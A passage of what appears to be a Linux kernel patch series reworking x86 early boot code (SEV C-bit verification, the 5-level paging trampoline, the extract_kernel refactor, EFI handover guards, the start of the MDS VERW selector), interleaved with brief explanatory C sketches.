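static void set_idt_entry(struct idt_gate *idt, unsigned int vector,
			  uint32_t handler, uint16_t selector)
{
	idt[vector].low  = (handler & 0x0000ffffu) | ((uint32_t)selector << 16);
	idt[vector].high = (handler & 0xffff0000u) | 0x00008e00u;
}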
++SYM_FUNC_START(startup32_load_idt)
++	push	%ebp
++	push	%ebx
++
++	call	1f
++1:	pop	%ebp
++
++	leal    (boot32_idt - 1b)(%ebp), %ebx
++
++	/* #VC handler */
++	leal    (startup32_vc_handler - 1b)(%ebp), %eax
++	movl    $X86_TRAP_VC, %edx
++	movl	%ebx, %ecx
++	call    startup32_set_idt_entry
++
++	/* Load IDT */
++	leal	(boot32_idt_desc - 1b)(%ebp), %ecx
++	movl	%ebx, 2(%ecx)
++	lidt    (%ecx)
++
++	pop	%ebx
++	pop	%ebp
++	RET
++SYM_FUNC_END(startup32_load_idt)
++
++/*
++ * Check for the correct C-bit position when the startup_32 boot-path is used.
++ *
++ * The check makes use of the fact that all memory is encrypted when paging is
++ * disabled. The function creates 64 bits of random data using the RDRAND
++ * instruction. RDRAND is mandatory for SEV guests, so it is always available.
++ * If the hypervisor violates that, the kernel will crash right here.
++ *
++ * The 64 bits of random data are stored to a memory location and at the same
++ * time kept in the %eax and %ebx registers. Since encryption is always active
++ * when paging is off the random data will be stored encrypted in main memory.
++ *
++ * Then paging is enabled. When the C-bit position is correct all memory is
++ * still mapped encrypted and comparing the register values with memory will
++ * succeed. An incorrect C-bit position will map all memory unencrypted, so that
++ * the compare will use the encrypted random data and fail.
++ */
++SYM_FUNC_START(startup32_check_sev_cbit)
++	pushl	%ebx
++	pushl	%ebp
++
++	call	0f
++0:	popl	%ebp
++
++	/* Check for non-zero sev_status */
++	movl	(sev_status - 0b)(%ebp), %eax
++	testl	%eax, %eax
++	jz	4f
++
++	/*
++	 * Get two 32-bit random values - Don't bail out if RDRAND fails
++	 * because it is better to prevent forward progress if no random value
++	 * can be gathered.
++	 */
++1:	rdrand	%eax
++	jnc	1b
++2:	rdrand	%ebx
++	jnc	2b
++
++	/* Store to memory and keep it in the registers */
++	leal	(sev_check_data - 0b)(%ebp), %ebp
++	movl	%eax, 0(%ebp)
++	movl	%ebx, 4(%ebp)
++
++	/* Enable paging to see if encryption is active */
++	movl	%cr0, %edx			 /* Backup %cr0 in %edx */
++	movl	$(X86_CR0_PG | X86_CR0_PE), %ecx /* Enable Paging and Protected mode */
++	movl	%ecx, %cr0
++
++	cmpl	%eax, 0(%ebp)
++	jne	3f
++	cmpl	%ebx, 4(%ebp)
++	jne	3f
++
++	movl	%edx, %cr0	/* Restore previous %cr0 */
++
++	jmp	4f
++
++3:	/* Check failed - hlt the machine */
++	hlt
++	jmp	3b
++
++4:
++	popl	%ebp
++	popl	%ebx
++	RET
++SYM_FUNC_END(startup32_check_sev_cbit)
++
+ 	.code64
+ 
+ #include "../../kernel/sev_verify_cbit.S"
+ 
+ 	.data
+ 
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	.balign	8
+ SYM_DATA(sme_me_mask,		.quad 0)
+ SYM_DATA(sev_status,		.quad 0)
+ SYM_DATA(sev_check_data,	.quad 0)
+-#endif
++
++SYM_DATA_START_LOCAL(boot32_idt)
++	.rept	32
++	.quad	0
++	.endr
++SYM_DATA_END(boot32_idt)
++
++SYM_DATA_START_LOCAL(boot32_idt_desc)
++	.word	. - boot32_idt - 1
++	.long	0
++SYM_DATA_END(boot32_idt_desc)
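
The descriptor packing done by startup32_set_idt_entry above can be
restated in C. A minimal sketch, assuming a placeholder selector value
(the real one comes from asm/segment.h via __KERNEL32_CS):

    #include <stdint.h>

    #define KERNEL32_CS 0x18  /* assumed placeholder for __KERNEL32_CS */

    /* Pack a present, DPL-0, 32-bit interrupt gate (type bits 0x8e00). */
    static void set_idt_entry(uint64_t *idt, int vector, uint32_t handler)
    {
        uint32_t lo = (handler & 0x0000ffffu) | ((uint32_t)KERNEL32_CS << 16);
        uint32_t hi = (handler & 0xffff0000u) | 0x00008e00u;

        idt[vector] = ((uint64_t)hi << 32) | lo;
    }
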
+diff --git a/arch/x86/boot/compressed/misc.c b/arch/x86/boot/compressed/misc.c
+index cf690d8712f4e..8ae7893d712ff 100644
+--- a/arch/x86/boot/compressed/misc.c
++++ b/arch/x86/boot/compressed/misc.c
+@@ -46,7 +46,7 @@ void *memmove(void *dest, const void *src, size_t n);
+ /*
+  * This is set up by the setup-routine at boot-time
+  */
+-struct boot_params *boot_params;
++struct boot_params *boot_params_ptr;
+ 
+ struct port_io_ops pio_ops;
+ 
+@@ -132,8 +132,8 @@ void __putstr(const char *s)
+ 	if (lines == 0 || cols == 0)
+ 		return;
+ 
+-	x = boot_params->screen_info.orig_x;
+-	y = boot_params->screen_info.orig_y;
++	x = boot_params_ptr->screen_info.orig_x;
++	y = boot_params_ptr->screen_info.orig_y;
+ 
+ 	while ((c = *s++) != '\0') {
+ 		if (c == '\n') {
+@@ -154,8 +154,8 @@ void __putstr(const char *s)
+ 		}
+ 	}
+ 
+-	boot_params->screen_info.orig_x = x;
+-	boot_params->screen_info.orig_y = y;
++	boot_params_ptr->screen_info.orig_x = x;
++	boot_params_ptr->screen_info.orig_y = y;
+ 
+ 	pos = (x + cols * y) * 2;	/* Update cursor position */
+ 	outb(14, vidport);
+@@ -277,7 +277,7 @@ static inline void handle_relocations(void *output, unsigned long output_len,
+ { }
+ #endif
+ 
+-static void parse_elf(void *output)
++static size_t parse_elf(void *output)
+ {
+ #ifdef CONFIG_X86_64
+ 	Elf64_Ehdr ehdr;
+@@ -293,10 +293,8 @@ static void parse_elf(void *output)
+ 	if (ehdr.e_ident[EI_MAG0] != ELFMAG0 ||
+ 	   ehdr.e_ident[EI_MAG1] != ELFMAG1 ||
+ 	   ehdr.e_ident[EI_MAG2] != ELFMAG2 ||
+-	   ehdr.e_ident[EI_MAG3] != ELFMAG3) {
++	   ehdr.e_ident[EI_MAG3] != ELFMAG3)
+ 		error("Kernel is not a valid ELF file");
+-		return;
+-	}
+ 
+ 	debug_putstr("Parsing ELF... ");
+ 
+@@ -328,6 +326,35 @@ static void parse_elf(void *output)
+ 	}
+ 
+ 	free(phdrs);
++
++	return ehdr.e_entry - LOAD_PHYSICAL_ADDR;
++}
++
++const unsigned long kernel_total_size = VO__end - VO__text;
++
++static u8 boot_heap[BOOT_HEAP_SIZE] __aligned(4);
++
++extern unsigned char input_data[];
++extern unsigned int input_len, output_len;
++
++unsigned long decompress_kernel(unsigned char *outbuf, unsigned long virt_addr,
++				void (*error)(char *x))
++{
++	unsigned long entry;
++
++	if (!free_mem_ptr) {
++		free_mem_ptr     = (unsigned long)boot_heap;
++		free_mem_end_ptr = (unsigned long)boot_heap + sizeof(boot_heap);
++	}
++
++	if (__decompress(input_data, input_len, NULL, NULL, outbuf, output_len,
++			 NULL, error) < 0)
++		return ULONG_MAX;
++
++	entry = parse_elf(outbuf);
++	handle_relocations(outbuf, output_len, virt_addr);
++
++	return entry;
+ }
+ 
+ /*
+@@ -347,25 +374,22 @@ static void parse_elf(void *output)
+  *             |-------uncompressed kernel image---------|
+  *
+  */
+-asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+-				  unsigned char *input_data,
+-				  unsigned long input_len,
+-				  unsigned char *output,
+-				  unsigned long output_len)
++asmlinkage __visible void *extract_kernel(void *rmode, unsigned char *output)
+ {
+-	const unsigned long kernel_total_size = VO__end - VO__text;
+ 	unsigned long virt_addr = LOAD_PHYSICAL_ADDR;
++	memptr heap = (memptr)boot_heap;
+ 	unsigned long needed_size;
++	size_t entry_offset;
+ 
+ 	/* Retain x86 boot parameters pointer passed from startup_32/64. */
+-	boot_params = rmode;
++	boot_params_ptr = rmode;
+ 
+ 	/* Clear flags intended for solely in-kernel use. */
+-	boot_params->hdr.loadflags &= ~KASLR_FLAG;
++	boot_params_ptr->hdr.loadflags &= ~KASLR_FLAG;
+ 
+-	sanitize_boot_params(boot_params);
++	sanitize_boot_params(boot_params_ptr);
+ 
+-	if (boot_params->screen_info.orig_video_mode == 7) {
++	if (boot_params_ptr->screen_info.orig_video_mode == 7) {
+ 		vidmem = (char *) 0xb0000;
+ 		vidport = 0x3b4;
+ 	} else {
+@@ -373,8 +397,8 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ 		vidport = 0x3d4;
+ 	}
+ 
+-	lines = boot_params->screen_info.orig_video_lines;
+-	cols = boot_params->screen_info.orig_video_cols;
++	lines = boot_params_ptr->screen_info.orig_video_lines;
++	cols = boot_params_ptr->screen_info.orig_video_cols;
+ 
+ 	init_default_io_ops();
+ 
+@@ -393,7 +417,7 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ 	 * so that early debugging output from the RSDP parsing code can be
+ 	 * collected.
+ 	 */
+-	boot_params->acpi_rsdp_addr = get_rsdp_addr();
++	boot_params_ptr->acpi_rsdp_addr = get_rsdp_addr();
+ 
+ 	debug_putstr("early console in extract_kernel\n");
+ 
+@@ -411,7 +435,7 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ 	 * entries. This ensures the full mapped area is usable RAM
+ 	 * and doesn't include any reserved areas.
+ 	 */
+-	needed_size = max(output_len, kernel_total_size);
++	needed_size = max_t(unsigned long, output_len, kernel_total_size);
+ #ifdef CONFIG_X86_64
+ 	needed_size = ALIGN(needed_size, MIN_KERNEL_ALIGN);
+ #endif
+@@ -442,7 +466,7 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ #ifdef CONFIG_X86_64
+ 	if (heap > 0x3fffffffffffUL)
+ 		error("Destination address too large");
+-	if (virt_addr + max(output_len, kernel_total_size) > KERNEL_IMAGE_SIZE)
++	if (virt_addr + needed_size > KERNEL_IMAGE_SIZE)
+ 		error("Destination virtual address is beyond the kernel mapping area");
+ #else
+ 	if (heap > ((-__PAGE_OFFSET-(128<<20)-1) & 0x7fffffff))
+@@ -454,16 +478,17 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ #endif
+ 
+ 	debug_putstr("\nDecompressing Linux... ");
+-	__decompress(input_data, input_len, NULL, NULL, output, output_len,
+-			NULL, error);
+-	parse_elf(output);
+-	handle_relocations(output, output_len, virt_addr);
+-	debug_putstr("done.\nBooting the kernel.\n");
++
++	entry_offset = decompress_kernel(output, virt_addr, error);
++
++	debug_putstr("done.\nBooting the kernel (entry_offset: 0x");
++	debug_puthex(entry_offset);
++	debug_putstr(").\n");
+ 
+ 	/* Disable exception handling before booting the kernel */
+ 	cleanup_exception_handling();
+ 
+-	return output;
++	return output + entry_offset;
+ }
+ 
+ void fortify_panic(const char *name)
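
The net effect of the refactor above is that extract_kernel() now
returns the address to jump to, not merely the load address. A hedged
sketch of the caller-side contract (the real caller is assembly in the
boot head code, simplified here to C; boot_kernel() is a stand-in):

    /* sketch of the caller-side contract, not actual kernel code */
    static void boot_kernel(void *rmode, unsigned char *output)
    {
        void *entry = extract_kernel(rmode, output);

        /* entry == output + (ehdr.e_entry - LOAD_PHYSICAL_ADDR) */
        ((void (*)(void))entry)();
    }
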
+diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h
+index a49d9219c06e5..254acd76efde2 100644
+--- a/arch/x86/boot/compressed/misc.h
++++ b/arch/x86/boot/compressed/misc.h
+@@ -52,7 +52,6 @@ extern memptr free_mem_ptr;
+ extern memptr free_mem_end_ptr;
+ void *malloc(int size);
+ void free(void *where);
+-extern struct boot_params *boot_params;
+ void __putstr(const char *s);
+ void __puthex(unsigned long value);
+ #define error_putstr(__x)  __putstr(__x)
+@@ -170,9 +169,7 @@ static inline int count_immovable_mem_regions(void) { return 0; }
+ #endif
+ 
+ /* ident_map_64.c */
+-#ifdef CONFIG_X86_5LEVEL
+ extern unsigned int __pgtable_l5_enabled, pgdir_shift, ptrs_per_p4d;
+-#endif
+ extern void kernel_add_identity_map(unsigned long start, unsigned long end);
+ 
+ /* Used by PAGE_KERN* macros: */
+diff --git a/arch/x86/boot/compressed/pgtable.h b/arch/x86/boot/compressed/pgtable.h
+index cc9b2529a0863..6d595abe06b34 100644
+--- a/arch/x86/boot/compressed/pgtable.h
++++ b/arch/x86/boot/compressed/pgtable.h
+@@ -3,18 +3,16 @@
+ 
+ #define TRAMPOLINE_32BIT_SIZE		(2 * PAGE_SIZE)
+ 
+-#define TRAMPOLINE_32BIT_PGTABLE_OFFSET	0
+-
+ #define TRAMPOLINE_32BIT_CODE_OFFSET	PAGE_SIZE
+-#define TRAMPOLINE_32BIT_CODE_SIZE	0x80
+-
+-#define TRAMPOLINE_32BIT_STACK_END	TRAMPOLINE_32BIT_SIZE
++#define TRAMPOLINE_32BIT_CODE_SIZE	0xA0
+ 
+ #ifndef __ASSEMBLER__
+ 
+ extern unsigned long *trampoline_32bit;
+ 
+-extern void trampoline_32bit_src(void *return_ptr);
++extern void trampoline_32bit_src(void *trampoline, bool enable_5lvl);
++
++extern const u16 trampoline_ljmp_imm_offset;
+ 
+ #endif /* __ASSEMBLER__ */
+ #endif /* BOOT_COMPRESSED_PAGETABLE_H */
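
The constants above imply a two-page layout: the page table in page 0
and the relocated trampoline code in page 1, which grew from 0x80 to
0xA0 bytes to make room for the LJMP return path. A compile-time sketch
of those invariants, assuming a 4 KiB PAGE_SIZE:

    /* compile-time sketch of the layout implied by the header above */
    _Static_assert(TRAMPOLINE_32BIT_CODE_OFFSET == PAGE_SIZE,
                   "trampoline code lives in the second page");
    _Static_assert(TRAMPOLINE_32BIT_CODE_OFFSET + TRAMPOLINE_32BIT_CODE_SIZE
                   <= TRAMPOLINE_32BIT_SIZE,
                   "0xA0 bytes of code must fit inside the two-page window");
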
+diff --git a/arch/x86/boot/compressed/pgtable_64.c b/arch/x86/boot/compressed/pgtable_64.c
+index 2ac12ff4111bf..51f957b24ba7a 100644
+--- a/arch/x86/boot/compressed/pgtable_64.c
++++ b/arch/x86/boot/compressed/pgtable_64.c
+@@ -16,11 +16,6 @@ unsigned int __section(".data") pgdir_shift = 39;
+ unsigned int __section(".data") ptrs_per_p4d = 1;
+ #endif
+ 
+-struct paging_config {
+-	unsigned long trampoline_start;
+-	unsigned long l5_required;
+-};
+-
+ /* Buffer to preserve trampoline memory */
+ static char trampoline_save[TRAMPOLINE_32BIT_SIZE];
+ 
+@@ -29,11 +24,10 @@ static char trampoline_save[TRAMPOLINE_32BIT_SIZE];
+  * purposes.
+  *
+  * Avoid putting the pointer into .bss as it will be cleared between
+- * paging_prepare() and extract_kernel().
++ * configure_5level_paging() and extract_kernel().
+  */
+ unsigned long *trampoline_32bit __section(".data");
+ 
+-extern struct boot_params *boot_params;
+ int cmdline_find_option_bool(const char *option);
+ 
+ static unsigned long find_trampoline_placement(void)
+@@ -54,7 +48,7 @@ static unsigned long find_trampoline_placement(void)
+ 	 *
+ 	 * Only look for values in the legacy ROM for non-EFI system.
+ 	 */
+-	signature = (char *)&boot_params->efi_info.efi_loader_signature;
++	signature = (char *)&boot_params_ptr->efi_info.efi_loader_signature;
+ 	if (strncmp(signature, EFI32_LOADER_SIGNATURE, 4) &&
+ 	    strncmp(signature, EFI64_LOADER_SIGNATURE, 4)) {
+ 		ebda_start = *(unsigned short *)0x40e << 4;
+@@ -70,10 +64,10 @@ static unsigned long find_trampoline_placement(void)
+ 	bios_start = round_down(bios_start, PAGE_SIZE);
+ 
+ 	/* Find the first usable memory region under bios_start. */
+-	for (i = boot_params->e820_entries - 1; i >= 0; i--) {
++	for (i = boot_params_ptr->e820_entries - 1; i >= 0; i--) {
+ 		unsigned long new = bios_start;
+ 
+-		entry = &boot_params->e820_table[i];
++		entry = &boot_params_ptr->e820_table[i];
+ 
+ 		/* Skip all entries above bios_start. */
+ 		if (bios_start <= entry->addr)
+@@ -106,12 +100,13 @@ static unsigned long find_trampoline_placement(void)
+ 	return bios_start - TRAMPOLINE_32BIT_SIZE;
+ }
+ 
+-struct paging_config paging_prepare(void *rmode)
++asmlinkage void configure_5level_paging(struct boot_params *bp, void *pgtable)
+ {
+-	struct paging_config paging_config = {};
++	void (*toggle_la57)(void *cr3);
++	bool l5_required = false;
+ 
+ 	/* Initialize boot_params. Required for cmdline_find_option_bool(). */
+-	boot_params = rmode;
++	boot_params_ptr = bp;
+ 
+ 	/*
+ 	 * Check if LA57 is desired and supported.
+@@ -129,12 +124,22 @@ struct paging_config paging_prepare(void *rmode)
+ 			!cmdline_find_option_bool("no5lvl") &&
+ 			native_cpuid_eax(0) >= 7 &&
+ 			(native_cpuid_ecx(7) & (1 << (X86_FEATURE_LA57 & 31)))) {
+-		paging_config.l5_required = 1;
++		l5_required = true;
++
++		/* Initialize variables for 5-level paging */
++		__pgtable_l5_enabled = 1;
++		pgdir_shift = 48;
++		ptrs_per_p4d = 512;
+ 	}
+ 
+-	paging_config.trampoline_start = find_trampoline_placement();
++	/*
++	 * The trampoline will not be used if the paging mode is already set to
++	 * the desired one.
++	 */
++	if (l5_required == !!(native_read_cr4() & X86_CR4_LA57))
++		return;
+ 
+-	trampoline_32bit = (unsigned long *)paging_config.trampoline_start;
++	trampoline_32bit = (unsigned long *)find_trampoline_placement();
+ 
+ 	/* Preserve trampoline memory */
+ 	memcpy(trampoline_save, trampoline_32bit, TRAMPOLINE_32BIT_SIZE);
+@@ -143,32 +148,32 @@ struct paging_config paging_prepare(void *rmode)
+ 	memset(trampoline_32bit, 0, TRAMPOLINE_32BIT_SIZE);
+ 
+ 	/* Copy trampoline code in place */
+-	memcpy(trampoline_32bit + TRAMPOLINE_32BIT_CODE_OFFSET / sizeof(unsigned long),
++	toggle_la57 = memcpy(trampoline_32bit +
++			TRAMPOLINE_32BIT_CODE_OFFSET / sizeof(unsigned long),
+ 			&trampoline_32bit_src, TRAMPOLINE_32BIT_CODE_SIZE);
+ 
++	/*
++	 * Avoid the need for a stack in the 32-bit trampoline code, by using
++	 * LJMP rather than LRET to return back to long mode. LJMP takes an
++	 * immediate absolute address, which needs to be adjusted based on the
++	 * placement of the trampoline.
++	 */
++	*(u32 *)((u8 *)toggle_la57 + trampoline_ljmp_imm_offset) +=
++						(unsigned long)toggle_la57;
++
+ 	/*
+ 	 * The code below prepares page table in trampoline memory.
+ 	 *
+ 	 * The new page table will be used by trampoline code for switching
+ 	 * from 4- to 5-level paging or vice versa.
+-	 *
+-	 * If switching is not required, the page table is unused: trampoline
+-	 * code wouldn't touch CR3.
+-	 */
+-
+-	/*
+-	 * We are not going to use the page table in trampoline memory if we
+-	 * are already in the desired paging mode.
+ 	 */
+-	if (paging_config.l5_required == !!(native_read_cr4() & X86_CR4_LA57))
+-		goto out;
+ 
+-	if (paging_config.l5_required) {
++	if (l5_required) {
+ 		/*
+ 		 * For 4- to 5-level paging transition, set up current CR3 as
+ 		 * the first and the only entry in a new top-level page table.
+ 		 */
+-		trampoline_32bit[TRAMPOLINE_32BIT_PGTABLE_OFFSET] = __native_read_cr3() | _PAGE_TABLE_NOENC;
++		*trampoline_32bit = __native_read_cr3() | _PAGE_TABLE_NOENC;
+ 	} else {
+ 		unsigned long src;
+ 
+@@ -181,38 +186,17 @@ struct paging_config paging_prepare(void *rmode)
+ 		 * may be above 4G.
+ 		 */
+ 		src = *(unsigned long *)__native_read_cr3() & PAGE_MASK;
+-		memcpy(trampoline_32bit + TRAMPOLINE_32BIT_PGTABLE_OFFSET / sizeof(unsigned long),
+-		       (void *)src, PAGE_SIZE);
++		memcpy(trampoline_32bit, (void *)src, PAGE_SIZE);
+ 	}
+ 
+-out:
+-	return paging_config;
+-}
+-
+-void cleanup_trampoline(void *pgtable)
+-{
+-	void *trampoline_pgtable;
+-
+-	trampoline_pgtable = trampoline_32bit + TRAMPOLINE_32BIT_PGTABLE_OFFSET / sizeof(unsigned long);
++	toggle_la57(trampoline_32bit);
+ 
+ 	/*
+-	 * Move the top level page table out of trampoline memory,
+-	 * if it's there.
++	 * Move the top level page table out of trampoline memory.
+ 	 */
+-	if ((void *)__native_read_cr3() == trampoline_pgtable) {
+-		memcpy(pgtable, trampoline_pgtable, PAGE_SIZE);
+-		native_write_cr3((unsigned long)pgtable);
+-	}
++	memcpy(pgtable, trampoline_32bit, PAGE_SIZE);
++	native_write_cr3((unsigned long)pgtable);
+ 
+ 	/* Restore trampoline memory */
+ 	memcpy(trampoline_32bit, trampoline_save, TRAMPOLINE_32BIT_SIZE);
+-
+-	/* Initialize variables for 5-level paging */
+-#ifdef CONFIG_X86_5LEVEL
+-	if (__read_cr4() & X86_CR4_LA57) {
+-		__pgtable_l5_enabled = 1;
+-		pgdir_shift = 48;
+-		ptrs_per_p4d = 512;
+-	}
+-#endif
+ }
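
Because the trampoline is copied to a runtime-chosen address below the
EBDA, the absolute target baked into its LJMP has to be rebased after
the copy. The hunk above does exactly that; restated as a standalone
sketch:

    /* sketch: rebase the 32-bit ljmp immediate after copying the code */
    u8  *code = (u8 *)trampoline_32bit + TRAMPOLINE_32BIT_CODE_OFFSET;
    u32 *imm  = (u32 *)(code + trampoline_ljmp_imm_offset);

    *imm += (u32)(unsigned long)code;  /* link-time offset -> runtime address */
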
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index 9c91cc40f4565..d07e665bb265b 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -327,20 +327,25 @@ static void enforce_vmpl0(void)
+  */
+ #define SNP_FEATURES_PRESENT (0)
+ 
++u64 snp_get_unsupported_features(u64 status)
++{
++	if (!(status & MSR_AMD64_SEV_SNP_ENABLED))
++		return 0;
++
++	return status & SNP_FEATURES_IMPL_REQ & ~SNP_FEATURES_PRESENT;
++}
++
+ void snp_check_features(void)
+ {
+ 	u64 unsupported;
+ 
+-	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
+-		return;
+-
+ 	/*
+ 	 * Terminate the boot if hypervisor has enabled any feature lacking
+ 	 * guest side implementation. Pass on the unsupported features mask through
+ 	 * EXIT_INFO_2 of the GHCB protocol so that those features can be reported
+ 	 * as part of the guest boot failure.
+ 	 */
+-	unsupported = sev_status & SNP_FEATURES_IMPL_REQ & ~SNP_FEATURES_PRESENT;
++	unsupported = snp_get_unsupported_features(sev_status);
+ 	if (unsupported) {
+ 		if (ghcb_version < 2 || (!boot_ghcb && !early_setup_ghcb()))
+ 			sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
+@@ -350,35 +355,22 @@ void snp_check_features(void)
+ 	}
+ }
+ 
+-void sev_enable(struct boot_params *bp)
++/*
++ * sev_check_cpu_support - Check for SEV support in the CPU capabilities
++ *
++ * Returns < 0 if SEV is not supported, otherwise the position of the
++ * encryption bit in the page table descriptors.
++ */
++static int sev_check_cpu_support(void)
+ {
+ 	unsigned int eax, ebx, ecx, edx;
+-	struct msr m;
+-	bool snp;
+-
+-	/*
+-	 * bp->cc_blob_address should only be set by boot/compressed kernel.
+-	 * Initialize it to 0 to ensure that uninitialized values from
+-	 * buggy bootloaders aren't propagated.
+-	 */
+-	if (bp)
+-		bp->cc_blob_address = 0;
+-
+-	/*
+-	 * Do an initial SEV capability check before snp_init() which
+-	 * loads the CPUID page and the same checks afterwards are done
+-	 * without the hypervisor and are trustworthy.
+-	 *
+-	 * If the HV fakes SEV support, the guest will crash'n'burn
+-	 * which is good enough.
+-	 */
+ 
+ 	/* Check for the SME/SEV support leaf */
+ 	eax = 0x80000000;
+ 	ecx = 0;
+ 	native_cpuid(&eax, &ebx, &ecx, &edx);
+ 	if (eax < 0x8000001f)
+-		return;
++		return -ENODEV;
+ 
+ 	/*
+ 	 * Check for the SME/SEV feature:
+@@ -393,6 +385,35 @@ void sev_enable(struct boot_params *bp)
+ 	native_cpuid(&eax, &ebx, &ecx, &edx);
+ 	/* Check whether SEV is supported */
+ 	if (!(eax & BIT(1)))
++		return -ENODEV;
++
++	return ebx & 0x3f;
++}
++
++void sev_enable(struct boot_params *bp)
++{
++	struct msr m;
++	int bitpos;
++	bool snp;
++
++	/*
++	 * bp->cc_blob_address should only be set by boot/compressed kernel.
++	 * Initialize it to 0 to ensure that uninitialized values from
++	 * buggy bootloaders aren't propagated.
++	 */
++	if (bp)
++		bp->cc_blob_address = 0;
++
++	/*
++	 * Do an initial SEV capability check before snp_init() which
++	 * loads the CPUID page and the same checks afterwards are done
++	 * without the hypervisor and are trustworthy.
++	 *
++	 * If the HV fakes SEV support, the guest will crash'n'burn
++	 * which is good enough.
++	 */
++
++	if (sev_check_cpu_support() < 0)
+ 		return;
+ 
+ 	/*
+@@ -403,26 +424,8 @@ void sev_enable(struct boot_params *bp)
+ 
+ 	/* Now repeat the checks with the SNP CPUID table. */
+ 
+-	/* Recheck the SME/SEV support leaf */
+-	eax = 0x80000000;
+-	ecx = 0;
+-	native_cpuid(&eax, &ebx, &ecx, &edx);
+-	if (eax < 0x8000001f)
+-		return;
+-
+-	/*
+-	 * Recheck for the SME/SEV feature:
+-	 *   CPUID Fn8000_001F[EAX]
+-	 *   - Bit 0 - Secure Memory Encryption support
+-	 *   - Bit 1 - Secure Encrypted Virtualization support
+-	 *   CPUID Fn8000_001F[EBX]
+-	 *   - Bits 5:0 - Pagetable bit position used to indicate encryption
+-	 */
+-	eax = 0x8000001f;
+-	ecx = 0;
+-	native_cpuid(&eax, &ebx, &ecx, &edx);
+-	/* Check whether SEV is supported */
+-	if (!(eax & BIT(1))) {
++	bitpos = sev_check_cpu_support();
++	if (bitpos < 0) {
+ 		if (snp)
+ 			error("SEV-SNP support indicated by CC blob, but not CPUID.");
+ 		return;
+@@ -454,7 +457,24 @@ void sev_enable(struct boot_params *bp)
+ 	if (snp && !(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
+ 		error("SEV-SNP support indicated by CC blob, but not SEV status MSR.");
+ 
+-	sme_me_mask = BIT_ULL(ebx & 0x3f);
++	sme_me_mask = BIT_ULL(bitpos);
++}
++
++/*
++ * sev_get_status - Retrieve the SEV status mask
++ *
++ * Returns 0 if the CPU is not SEV capable, otherwise the value of the
++ * AMD64_SEV MSR.
++ */
++u64 sev_get_status(void)
++{
++	struct msr m;
++
++	if (sev_check_cpu_support() < 0)
++		return 0;
++
++	boot_rdmsr(MSR_AMD64_SEV, &m);
++	return m.q;
+ }
+ 
+ /* Search for Confidential Computing blob in the EFI config table. */
+@@ -545,7 +565,7 @@ void sev_prep_identity_maps(unsigned long top_level_pgt)
+ 	 * accessed after switchover.
+ 	 */
+ 	if (sev_snp_enabled()) {
+-		unsigned long cc_info_pa = boot_params->cc_blob_address;
++		unsigned long cc_info_pa = boot_params_ptr->cc_blob_address;
+ 		struct cc_blob_sev_info *cc_info;
+ 
+ 		kernel_add_identity_map(cc_info_pa, cc_info_pa + sizeof(*cc_info));
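
The sev_check_cpu_support() helper factored out above boils down to two
CPUID queries. A self-contained illustration using GCC's <cpuid.h> (the
boot code itself uses native_cpuid(), and the function name here is
hypothetical):

    #include <cpuid.h>

    /* Returns the C-bit position (CPUID 0x8000001F EBX[5:0]),
     * or -1 when SEV is not advertised.
     */
    static int sev_cbit_position(void)
    {
        unsigned int eax, ebx, ecx, edx;

        if (!__get_cpuid(0x80000000, &eax, &ebx, &ecx, &edx) ||
            eax < 0x8000001f)
            return -1;
        if (!__get_cpuid(0x8000001f, &eax, &ebx, &ecx, &edx))
            return -1;
        if (!(eax & (1u << 1)))  /* EAX bit 1: SEV supported */
            return -1;
        return ebx & 0x3f;       /* encryption bit position */
    }
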
+diff --git a/arch/x86/boot/header.S b/arch/x86/boot/header.S
+index f912d77701305..d31982509654d 100644
+--- a/arch/x86/boot/header.S
++++ b/arch/x86/boot/header.S
+@@ -406,7 +406,7 @@ xloadflags:
+ # define XLF1 0
+ #endif
+ 
+-#ifdef CONFIG_EFI_STUB
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+ # ifdef CONFIG_EFI_MIXED
+ #  define XLF23 (XLF_EFI_HANDOVER_32|XLF_EFI_HANDOVER_64)
+ # else
+diff --git a/arch/x86/boot/tools/build.c b/arch/x86/boot/tools/build.c
+index a3725ad46c5a0..bd247692b7017 100644
+--- a/arch/x86/boot/tools/build.c
++++ b/arch/x86/boot/tools/build.c
+@@ -290,6 +290,7 @@ static void efi_stub_entry_update(void)
+ {
+ 	unsigned long addr = efi32_stub_entry;
+ 
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+ #ifdef CONFIG_X86_64
+ 	/* Yes, this is really how we defined it :( */
+ 	addr = efi64_stub_entry - 0x200;
+@@ -298,6 +299,7 @@ static void efi_stub_entry_update(void)
+ #ifdef CONFIG_EFI_MIXED
+ 	if (efi32_stub_entry != addr)
+ 		die("32-bit and 64-bit EFI entry points do not match\n");
++#endif
+ #endif
+ 	put_unaligned_le32(addr, &buf[0x264]);
+ }
+diff --git a/arch/x86/entry/entry.S b/arch/x86/entry/entry.S
+index bfb7bcb362bcf..09e99d13fc0b3 100644
+--- a/arch/x86/entry/entry.S
++++ b/arch/x86/entry/entry.S
+@@ -6,6 +6,9 @@
+ #include <linux/linkage.h>
+ #include <asm/export.h>
+ #include <asm/msr-index.h>
++#include <asm/unwind_hints.h>
++#include <asm/segment.h>
++#include <asm/cache.h>
+ 
+ .pushsection .noinstr.text, "ax"
+ 
+@@ -20,3 +23,23 @@ SYM_FUNC_END(entry_ibpb)
+ EXPORT_SYMBOL_GPL(entry_ibpb);
+ 
+ .popsection
++
++/*
++ * Define the VERW operand that is disguised as entry code so that
++ * it can be referenced with KPTI enabled. This ensures VERW can be
++ * used late in exit-to-user path after page tables are switched.
++ */
++.pushsection .entry.text, "ax"
++
++.align L1_CACHE_BYTES, 0xcc
++SYM_CODE_START_NOALIGN(mds_verw_sel)
++	UNWIND_HINT_EMPTY
++	ANNOTATE_NOENDBR
